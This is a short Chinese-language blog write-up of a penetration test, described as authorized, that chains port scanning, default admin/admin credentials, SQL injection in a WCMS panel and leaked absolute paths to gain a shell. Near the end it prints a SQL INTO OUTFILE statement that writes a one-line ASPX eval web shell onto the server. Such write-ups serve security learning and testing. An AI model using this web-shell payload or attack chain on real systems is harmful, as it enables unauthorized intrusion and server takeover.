记一次实战getshell

作者: CSeroad | 来源:发表于2018-08-13 21:57 被阅读69次

    前言:

    在经过授权的情况下,对指定IP进行测试。

    在前期信息收集中,找到xxx.xxx.xxx.xxx开放的端口和弱口令进入后台,并发现后台中有sql注入。这些的危害都不小,但依然没有getshell。

    信息收集

    峰回路转

    直到在crocus系统中找到一个有意思的界面。

    crocus

    日志下载。。

    绝对路径

    绝对路径。如果配合之前的sql注入点利用sqlmap的sqlshell写一句话木马就好啦。

    之前的sql注入点是在这个文件管理的地方。

    文件类型

    大概在文件类型中有注入点。

    keyType

    那现在先把日志若暴露的绝对路径收集一下。

    路径

    还有很多,就不写啦。。

    那现在首先可以确定是在CMS Server路径下面。可到底是哪个呢。。也没有crocus相关的文件名。思考半天,无果。

    转念之间。。我看到了什么。

    wcms

    这个感觉好像在哪见过。。

    wcms

    12055的端口。默认密码admin,admin,登录进还有SQL注入。可以利用这个的注入写shell啊。

    车牌号搜索有SQL注入。

    ok true

    Ok,有注入,有权限,有绝对路径。激动。。

    sql-shell

    一激动怎么还把php写上啦。

    php

    没毛病,写进入啦。。getshell不在话下。

    getshell

    改为aspx一句话木马

    into  outfile

    select  '<%@ Page Language="Jscript"%> <%eval(Request.Item["pass"],"unsafe");%>' INTO OUTFILE 'C://Program Files (x86)//CMS Server//WCMS4.0//x.aspx'

    再次访问。

    success success

    总结:

    这次成功getshell可并不太容易,可以说是高位端口扫描、弱口令、SQL注入、文件下载共同完成了这次渗透。

    相关文章

      网友评论

        本文标题:记一次实战getshell

        本文链接:https://www.haomeiwen.com/subject/ocrpbftx.html